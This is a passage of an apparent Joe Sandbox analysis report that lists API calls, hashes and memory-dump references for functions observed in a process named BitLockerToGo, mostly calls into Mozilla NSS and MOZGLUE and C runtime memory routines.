                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                      • Opcode ID: 6457ad549302eea11625bfd87f6c25313b76c222ec872f4614975cb54fcd8605
                                                                                                                                                      • Instruction ID: 17c63aaef85d11d7450f399fe2994da5deeb37f359f62a0fde47d29a058a1428
                                                                                                                                                      • Opcode Fuzzy Hash: 6457ad549302eea11625bfd87f6c25313b76c222ec872f4614975cb54fcd8605
                                                                                                                                                      • Instruction Fuzzy Hash: 5A11BC71604A219BC704BF38C4881AABBF4FF05308F01882ADC88D7B00E734E895CBD2
                                                                                                                                                      APIs
                                                                                                                                                      • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C9A5F17,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BAC94
                                                                                                                                                      • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C9A5F17,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACA6
                                                                                                                                                      • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACC0
                                                                                                                                                      • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACDB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3989322779-0
                                                                                                                                                      • Opcode ID: c4cad14657aafc5d7afdab64710582e43a4b8e1a043d51b03e29b79ec74d345d
                                                                                                                                                      • Instruction ID: d124255ec461c6c0ec77bd2650810c1eed4b2c0e53f49eddb430b57c63b56ffc
                                                                                                                                                      • Opcode Fuzzy Hash: c4cad14657aafc5d7afdab64710582e43a4b8e1a043d51b03e29b79ec74d345d
                                                                                                                                                      • Instruction Fuzzy Hash: D7015EB1701B06ABEB50DF2AD908767B7E8BF10669B104839D85AD3E00EB35F055CB91
                                                                                                                                                      APIs
                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C7FF20E,?), ref: 6C833DF5
                                                                                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C7FF20E,00000000,?), ref: 6C833DFC
                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C833E06
                                                                                                                                                      • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C833E0E
                                                                                                                                                        • Part of subcall function 6C82CC00: GetCurrentProcess.KERNEL32(?,?,6C7F31A7), ref: 6C82CC0D
                                                                                                                                                        • Part of subcall function 6C82CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7F31A7), ref: 6C82CC16
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2787204188-0
                                                                                                                                                      • Opcode ID: dd04e901801cc4f88a2e51ad1a539ae2a66ee8a8b56103e9383e67c44f338d87
                                                                                                                                                      • Instruction ID: 7d71e5e8d97d4ca82b300baf92fa1cb18083b6b9d35e0fafd66b53273b4902b1
                                                                                                                                                      • Opcode Fuzzy Hash: dd04e901801cc4f88a2e51ad1a539ae2a66ee8a8b56103e9383e67c44f338d87
                                                                                                                                                      • Instruction Fuzzy Hash: 80F05EB15002186BEB11AB54DC89DBF376DDB46628F040430FD0857741E635BD5586F6
                                                                                                                                                      APIs
                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC2D
                                                                                                                                                        • Part of subcall function 6C95ADC0: TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE10
                                                                                                                                                        • Part of subcall function 6C95ADC0: EnterCriticalSection.KERNEL32(?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE24
                                                                                                                                                        • Part of subcall function 6C95ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C93D079,00000000,00000001), ref: 6C95AE5A
                                                                                                                                                        • Part of subcall function 6C95ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE6F
                                                                                                                                                        • Part of subcall function 6C95ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE7F
                                                                                                                                                        • Part of subcall function 6C95ADC0: TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEB1
                                                                                                                                                        • Part of subcall function 6C95ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEC9
                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC44
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC59
                                                                                                                                                      • free.MOZGLUE(8CB6FF01,6C996AC6,6C9A639C,?,?,?,?,?,?,?,?,?,6C9A5D40,00000000,?,6C9AAAD4), ref: 6C9BAC62
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1595327144-0
                                                                                                                                                      • Opcode ID: ed245467a681458e2c1271d463b380a412d6a26f6d68c54e3e4b074071a4b926
                                                                                                                                                      • Instruction ID: dae07adf9ae3e86d560eb49eb4ea2f25195cef39595c0219317bfa548ba2a7b0
                                                                                                                                                      • Opcode Fuzzy Hash: ed245467a681458e2c1271d463b380a412d6a26f6d68c54e3e4b074071a4b926
                                                                                                                                                      • Instruction Fuzzy Hash: 840178B5600200AFDB00DF19E8C0B5677ACAB24B1CF188068E8099F706EB34F808CBA1
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalDeleteSectionfree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2988086103-0
                                                                                                                                                      • Opcode ID: 0cadb8d137edc138627b23894278a13bbcfa7e55355c54ef4e71ea9baa096ee1
                                                                                                                                                      • Instruction ID: 04fdf01d2802e5dde9ad98a29d64a9454083caade1026387f44ae77baf58050c
                                                                                                                                                      • Opcode Fuzzy Hash: 0cadb8d137edc138627b23894278a13bbcfa7e55355c54ef4e71ea9baa096ee1
                                                                                                                                                      • Instruction Fuzzy Hash: FDE030767017099BCE10EFA9DC4489677ACEE492743154525E691C3700D235F905CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C8485D3
                                                                                                                                                        • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C848725
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                      • String ID: map/set<T> too long
                                                                                                                                                      • API String ID: 3720097785-1285458680
                                                                                                                                                      • Opcode ID: c615b4786a7bd9001a74d24f5336abf916d431f52e4aa10f78160fecb3a04056
                                                                                                                                                      • Instruction ID: 99d121f31d37d4441b249fc4e98bc6687ed44deda016a42f33a3147eeb070ebf
                                                                                                                                                      • Opcode Fuzzy Hash: c615b4786a7bd9001a74d24f5336abf916d431f52e4aa10f78160fecb3a04056
                                                                                                                                                      • Instruction Fuzzy Hash: A35187746006498FC751CF18C298A5ABBF1BF4A318F18C99AD8599BB52C335EC85CFD2
                                                                                                                                                      APIs
                                                                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C7FBDEB
                                                                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7FBE8F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 2811501404-4108050209
                                                                                                                                                      • Opcode ID: e5b7ff1c8faa6ac38313a719e4095a4e49699537b1a101dffa96fff35975d36f
                                                                                                                                                      • Instruction ID: 2aee2c4f44d19d23d8c24850e375ff80d7a574b6adac69a4f9a4139283e6595f
                                                                                                                                                      • Opcode Fuzzy Hash: e5b7ff1c8faa6ac38313a719e4095a4e49699537b1a101dffa96fff35975d36f
                                                                                                                                                      • Instruction Fuzzy Hash: DE41A271509745CFC711DF38C5C199BB7E8AF8A348F008A2DF9A557711D730E9468B92
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C964D57
                                                                                                                                                      • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C964DE6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorR_snprintf
                                                                                                                                                      • String ID: %d.%d
                                                                                                                                                      • API String ID: 2298970422-3954714993
                                                                                                                                                      • Opcode ID: ea178631ccb6f80727a186b926ca97557c5390cd9694fd6d6da4f6612618e0b4
                                                                                                                                                      • Instruction ID: 54f5eadc74ca9e78427d8f920a7db6d9908a8e07922b4945b3f8c3be8dd46777
                                                                                                                                                      • Opcode Fuzzy Hash: ea178631ccb6f80727a186b926ca97557c5390cd9694fd6d6da4f6612618e0b4
                                                                                                                                                      • Instruction Fuzzy Hash: B331C5B2D042196AFB149BA6DC11BFF776CEF50308F050469ED159BB81EB30E945CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C833D19
                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C833D6C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _errnomozalloc_abort
                                                                                                                                                      • String ID: d
                                                                                                                                                      • API String ID: 3471241338-2564639436
                                                                                                                                                      • Opcode ID: 8b6df80922d8fc8b5b5648ae8a9718b92c46cfb70e43a7c43fbcb9865747b652
                                                                                                                                                      • Instruction ID: d6029fc4c51c537bd092cf79f012cee555e426e1c45c40dd8b87832f1992eacb
                                                                                                                                                      • Opcode Fuzzy Hash: 8b6df80922d8fc8b5b5648ae8a9718b92c46cfb70e43a7c43fbcb9865747b652
                                                                                                                                                      • Instruction Fuzzy Hash: A8113B31E0465897DB229F9DC9144FDB375EF86219B44B629DC4897601FB30A9C5C3D0
                                                                                                                                                      APIs
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C856E22
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C856E3F
                                                                                                                                                      Strings
                                                                                                                                                      • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C856E1D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Init_thread_footergetenv
                                                                                                                                                      • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                      • API String ID: 1472356752-1153589363
                                                                                                                                                      • Opcode ID: 1d7b9e42db77952f365a57a0f3f681a22dd00ec1e23c81c728e50bdc4e4c331d
                                                                                                                                                      • Instruction ID: 61f86f98b0d57dbcac57c5e3724d7671752db124057f32f6348e1bfc3cc31fc7
                                                                                                                                                      • Opcode Fuzzy Hash: 1d7b9e42db77952f365a57a0f3f681a22dd00ec1e23c81c728e50bdc4e4c331d
                                                                                                                                                      • Instruction Fuzzy Hash: 18F0F03430A2408ADA328A69CE5CA8937725B2222CF540975C40846BA1F720A926CAF2
                                                                                                                                                      APIs
                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B628
                                                                                                                                                        • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                        • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B67D
                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B708
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C84B127,?,?,?,?,?,?,?,?), ref: 6C84B74D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                      • Opcode ID: 99920fe503abb6f6a2bda47e5caa03bbdeda4aba0d995207804f6c48a7ba31ca
                                                                                                                                                      • Instruction ID: 509043c577dd1c1ef027b24938f864cfd9d9aa2ef42f9d7f001bcd450e7f4871
                                                                                                                                                      • Opcode Fuzzy Hash: 99920fe503abb6f6a2bda47e5caa03bbdeda4aba0d995207804f6c48a7ba31ca
                                                                                                                                                      • Instruction Fuzzy Hash: 3951C071A05A1A8FDB24CF58CA8476EB7B5FF46314F45C92DC85AAB700D731AC04CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B5EA
                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B623
                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B66C
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B67F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: malloc$free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1480856625-0
                                                                                                                                                      • Opcode ID: 0299614b0e40c6d730d07288a264dea87203f340a74ac0b4f443ced39e28afdb
                                                                                                                                                      • Instruction ID: 2271ad6c32e394e595b992c4e70683b1fd6175c9753e2bf7fa2c1fe68fcea287
                                                                                                                                                      • Opcode Fuzzy Hash: 0299614b0e40c6d730d07288a264dea87203f340a74ac0b4f443ced39e28afdb
                                                                                                                                                      • Instruction Fuzzy Hash: D2310A719002158FDB60CF58C94466EB7F6FF80304F568929C8069B341EB71ED25CBE1
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$calloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3339632435-0
                                                                                                                                                      • Opcode ID: e3bc9d2cceda57083d1fcff23ecd596287ae36fb6307b6ee97c2040888d061b1
                                                                                                                                                      • Instruction ID: 4a8520431e11487eb29c950eb49da23a5a0e93faf59d2b10bf190d8967c50c95
                                                                                                                                                      • Opcode Fuzzy Hash: e3bc9d2cceda57083d1fcff23ecd596287ae36fb6307b6ee97c2040888d061b1
                                                                                                                                                      • Instruction Fuzzy Hash: 0E310AB0606391CBDB246F38C9442797BB8BF16708F01A62DD888C7A11EB35C486CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C82F611
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C82F623
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C82F652
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C82F668
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                      • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                      • Instruction ID: 94bc3fdb4faecc4cc1f8036c6a03a1a38c4a4daf4f98934563aeb81217c66512
                                                                                                                                                      • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                      • Instruction Fuzzy Hash: 33316171A002249FCB24CF1DCEC4E9B77B5EB94354B148938FA498BB05D635E984CB90